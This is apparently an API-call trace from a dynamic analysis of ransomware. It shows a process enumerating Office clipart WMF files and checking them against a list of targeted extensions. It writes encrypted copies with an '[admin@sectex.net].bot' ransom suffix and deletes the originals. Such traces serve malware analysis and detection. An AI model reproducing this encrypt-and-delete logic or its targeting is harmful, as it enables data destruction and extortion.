	[0171.535] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1e80, lpOverlapped=0x0) returned 1
	[0171.536] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.536] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.536] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.536] CloseHandle (hObject=0x3c4) returned 1
	[0171.536] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.536] SetEndOfFile (hFile=0x388) returned 1
	[0171.538] CloseHandle (hObject=0x388) returned 1
	[0171.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.539] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf")) returned 1
	[0171.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.540] lstrlenW (lpString=".doc") returned 4
	[0171.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.540] lstrlenW (lpString=".docx") returned 5
	[0171.541] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.541] lstrlenW (lpString=".pdf") returned 4
	[0171.541] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString=".xls") returned 4
	[0171.541] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.541] lstrlenW (lpString=".xlsx") returned 5
	[0171.541] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.541] lstrlenW (lpString=".ppt") returned 4
	[0171.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.541] lstrlenW (lpString=".zip") returned 4
	[0171.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.541] lstrlenW (lpString=".rar") returned 4
	[0171.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString=".bz2") returned 4
	[0171.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString=".7z") returned 3
	[0171.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.541] lstrlenW (lpString=".dbf") returned 4
	[0171.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.541] lstrlenW (lpString=".1cd") returned 4
	[0171.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.541] lstrlenW (lpString=".jpg") returned 4
	[0171.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.541] lstrlenW (lpString=".doc") returned 4
	[0171.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString=".docx") returned 5
	[0171.542] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.542] lstrlenW (lpString=".pdf") returned 4
	[0171.542] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString=".xls") returned 4
	[0171.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.542] lstrlenW (lpString=".xlsx") returned 5
	[0171.542] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.542] lstrlenW (lpString=".ppt") returned 4
	[0171.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.542] lstrlenW (lpString=".zip") returned 4
	[0171.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.542] lstrlenW (lpString=".rar") returned 4
	[0171.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString=".bz2") returned 4
	[0171.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString=".7z") returned 3
	[0171.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.542] lstrlenW (lpString=".dbf") returned 4
	[0171.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.542] lstrlenW (lpString=".1cd") returned 4
	[0171.542] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 63
	[0171.542] lstrlenW (lpString=".jpg") returned 4
	[0171.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.543] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.543] lstrlenW (lpString="J0185834.WMF") returned 12
	[0171.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.544] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8578) returned 1
	[0171.544] CloseHandle (hObject=0x388) returned 1
	[0171.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf")) returned 0x20
	[0171.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.544] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.544] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.545] GetLastError () returned 0x0
	[0171.545] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2182, lpOverlapped=0x0) returned 1
	[0171.547] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2190, lpOverlapped=0x0) returned 1
	[0171.548] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.548] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.548] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.548] CloseHandle (hObject=0x3c4) returned 1
	[0171.548] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.548] SetEndOfFile (hFile=0x388) returned 1
	[0171.550] CloseHandle (hObject=0x388) returned 1
	[0171.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.551] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf")) returned 1
	[0171.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.551] lstrlenW (lpString=".doc") returned 4
	[0171.551] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.551] lstrlenW (lpString=".docx") returned 5
	[0171.551] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.551] lstrlenW (lpString=".pdf") returned 4
	[0171.551] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.551] lstrlenW (lpString=".xls") returned 4
	[0171.551] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.552] lstrlenW (lpString=".xlsx") returned 5
	[0171.552] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.552] lstrlenW (lpString=".ppt") returned 4
	[0171.552] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.552] lstrlenW (lpString=".zip") returned 4
	[0171.552] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.552] lstrlenW (lpString=".rar") returned 4
	[0171.552] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString=".bz2") returned 4
	[0171.552] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString=".7z") returned 3
	[0171.552] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.552] lstrlenW (lpString=".dbf") returned 4
	[0171.552] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.552] lstrlenW (lpString=".1cd") returned 4
	[0171.552] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.552] lstrlenW (lpString=".jpg") returned 4
	[0171.552] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.552] lstrlenW (lpString=".doc") returned 4
	[0171.552] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString=".docx") returned 5
	[0171.552] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0171.552] lstrlenW (lpString=".pdf") returned 4
	[0171.552] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.552] lstrlenW (lpString=".xls") returned 4
	[0171.552] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.553] lstrlenW (lpString=".xlsx") returned 5
	[0171.553] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0171.553] lstrlenW (lpString=".ppt") returned 4
	[0171.553] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.553] lstrlenW (lpString=".zip") returned 4
	[0171.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.553] lstrlenW (lpString=".rar") returned 4
	[0171.553] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.553] lstrlenW (lpString=".bz2") returned 4
	[0171.553] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.553] lstrlenW (lpString=".7z") returned 3
	[0171.553] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.553] lstrlenW (lpString=".dbf") returned 4
	[0171.553] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.553] lstrlenW (lpString=".1cd") returned 4
	[0171.553] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 63
	[0171.553] lstrlenW (lpString=".jpg") returned 4
	[0171.553] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.554] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.554] lstrlenW (lpString="J0185842.WMF") returned 12
	[0171.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.556] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=14308) returned 1
	[0171.556] CloseHandle (hObject=0x388) returned 1
	[0171.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf")) returned 0x20
	[0171.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.556] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.556] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.557] GetLastError () returned 0x0
	[0171.557] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x37e4, lpOverlapped=0x0) returned 1
	[0171.559] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x37f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x37f0, lpOverlapped=0x0) returned 1
	[0171.560] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.560] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.560] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.560] CloseHandle (hObject=0x3c4) returned 1
	[0171.560] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.560] SetEndOfFile (hFile=0x388) returned 1
	[0171.562] CloseHandle (hObject=0x388) returned 1
	[0171.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.563] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf")) returned 1
	[0171.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.563] lstrlenW (lpString=".doc") returned 4
	[0171.563] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.563] lstrlenW (lpString=".docx") returned 5
	[0171.563] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.564] lstrlenW (lpString=".pdf") returned 4
	[0171.564] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString=".xls") returned 4
	[0171.564] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.564] lstrlenW (lpString=".xlsx") returned 5
	[0171.564] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.564] lstrlenW (lpString=".ppt") returned 4
	[0171.564] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.564] lstrlenW (lpString=".zip") returned 4
	[0171.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.564] lstrlenW (lpString=".rar") returned 4
	[0171.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString=".bz2") returned 4
	[0171.564] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString=".7z") returned 3
	[0171.564] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.564] lstrlenW (lpString=".dbf") returned 4
	[0171.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.564] lstrlenW (lpString=".1cd") returned 4
	[0171.564] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.564] lstrlenW (lpString=".jpg") returned 4
	[0171.564] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.564] lstrlenW (lpString=".doc") returned 4
	[0171.564] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.564] lstrlenW (lpString=".docx") returned 5
	[0171.564] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.565] lstrlenW (lpString=".pdf") returned 4
	[0171.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.565] lstrlenW (lpString=".xls") returned 4
	[0171.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.565] lstrlenW (lpString=".xlsx") returned 5
	[0171.565] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.565] lstrlenW (lpString=".ppt") returned 4
	[0171.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.565] lstrlenW (lpString=".zip") returned 4
	[0171.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.565] lstrlenW (lpString=".rar") returned 4
	[0171.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.565] lstrlenW (lpString=".bz2") returned 4
	[0171.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.565] lstrlenW (lpString=".7z") returned 3
	[0171.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.565] lstrlenW (lpString=".dbf") returned 4
	[0171.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.565] lstrlenW (lpString=".1cd") returned 4
	[0171.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 63
	[0171.565] lstrlenW (lpString=".jpg") returned 4
	[0171.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.565] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.566] lstrlenW (lpString="J0186346.WMF") returned 12
	[0171.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.566] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8666) returned 1
	[0171.566] CloseHandle (hObject=0x388) returned 1
	[0171.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf")) returned 0x20
	[0171.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.567] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.567] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.567] GetLastError () returned 0x0
	[0171.567] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x21da, lpOverlapped=0x0) returned 1
	[0171.708] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x21e0, lpOverlapped=0x0) returned 1
